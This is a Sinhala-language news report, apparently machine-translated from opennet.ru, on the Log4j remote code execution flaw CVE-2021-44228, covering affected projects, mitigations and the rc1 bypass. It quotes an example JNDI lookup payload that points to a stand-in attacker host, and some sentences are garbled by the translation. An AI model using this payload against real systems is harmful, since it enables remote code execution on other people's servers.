Apache Log4j, ජාවා යෙදුම්වල ලොග් වීම සංවිධානය කිරීම සඳහා ජනප්රිය රාමුවක් තුළ, “{jndi:URL}” ආකෘතියේ විශේෂයෙන් ෆෝමැට් කළ අගයක් ලොගයට ලියා ඇති විට අත්තනෝමතික කේතය ක්රියාත්මක කිරීමට ඉඩ සලසන තීරණාත්මක අවදානමක් හඳුනාගෙන ඇත. බාහිර මූලාශ්රවලින් ලැබෙන අගයන් ලොග් කරන ජාවා යෙදුම් මත ප්රහාරය සිදු කළ හැකිය, උදාහරණයක් ලෙස, දෝෂ පණිවිඩවල ගැටළු සහගත අගයන් පෙන්වන විට.
Steam, Apple iCloud, Minecraft සේවාදායකයන් සහ සේවාදායකයන් ඇතුළුව Apache Struts, Apache Solr, Apache Druid හෝ Apache Flink වැනි රාමු භාවිතා කරන සියලුම ව්යාපෘති පාහේ ගැටලුවට බලපාන බව සටහන් වේ. අනාරක්ෂිත බව ආයතනික යෙදුම් වලට දැවැන්ත ප්රහාර රැල්ලකට තුඩු දෙනු ඇතැයි අපේක්ෂා කෙරේ, Apache Struts රාමුවේ ඇති විවේචනාත්මක අවදානම් වල ඉතිහාසය පුනරාවර්තනය කරයි, එය දළ ඇස්තමේන්තුවකට අනුව, Fortune හි 65% කින් වෙබ් යෙදුම්වල භාවිතා වේ. අවදානම් සහිත පද්ධති සඳහා ජාලය පරිලෝකනය කිරීමේ උත්සාහයන් ඇතුළුව සමාගම් 100 ක්.
වැඩ කරන සූරාකෑමක් දැනටමත් ප්රකාශයට පත් කර ඇති නමුත් ස්ථාවර ශාඛා සඳහා නිවැරදි කිරීම් තවමත් සම්පාදනය කර නොමැති නිසා ගැටළුව උග්ර වේ. CVE හැඳුනුම්කාරකය තවම පවරා නැත. නිවැරදි කිරීම ඇතුළත් කර ඇත්තේ log4j-2.15.0-rc1 පරීක්ෂණ ශාඛාවේ පමණි. අවදානම අවහිර කිරීම සඳහා විසඳුමක් ලෙස, log4j2.formatMsgNoLookups පරාමිතිය සත්ය ලෙස සැකසීමට නිර්දේශ කෙරේ.
JNDI (ජාවා නාමකරණය සහ නාමාවලි අතුරුමුහුණත) විමසුම් ක්රියාත්මක කළ හැකි ලොගයට ප්රතිදානය කරන ලද රේඛා තුළ විශේෂ වෙස් මුහුණු “{}” සැකසීමට log4j සහාය දක්වන නිසා ගැටලුව ඇති විය. ප්රහාරය “${jndi:ldap://attacker.com/a}” ආදේශනය සමඟ තන්තුවක් පසුකර යාම දක්වා පහත වැටේ, කුමන log4j විසින් ජාවා පන්තියට යන මාර්ගය සඳහා LDAP ඉල්ලීමක් attacker.com සේවාදායකය වෙත යවනු ඇත. . ප්රහාරකයාගේ සේවාදායකය විසින් ආපසු ලබා දෙන මාර්ගය (උදාහරණයක් ලෙස, http://second-stage.attacker.com/Exploit.class) වත්මන් ක්රියාවලියේ සන්දර්භය තුළ පූරණය කර ක්රියාත්මක කරනු ඇත, එමඟින් ප්රහාරකයාට අත්තනෝමතික කේතය ක්රියාත්මක කිරීමට ඉඩ සලසයි. වත්මන් යෙදුමේ අයිතිවාසිකම් සහිත පද්ධතිය.
අතිරේක 1: අවදානමට CVE-2021-44228 හඳුනාගැනීම පවරා ඇත.
අතිරේක 2: log4j-2.15.0-rc1 නිකුතුව මගින් එකතු කරන ලද ආරක්ෂාව මඟ හැරීමේ මාර්ගයක් හඳුනාගෙන ඇත. නව යාවත්කාලීනයක්, log4j-2.15.0-rc2, අවදානමට එරෙහිව වඩාත් සම්පූර්ණ ආරක්ෂාවක් සහිතව යෝජනා කර ඇත. වැරදි ලෙස ෆෝමැට් කරන ලද JNDI URL භාවිතා කිරීමේදී අසාමාන්ය අවසන් කිරීමක් නොමැති වීම හා සම්බන්ධ වෙනස්වීම කේතය ඉස්මතු කරයි.
මූලාශ්රය: opennet.ru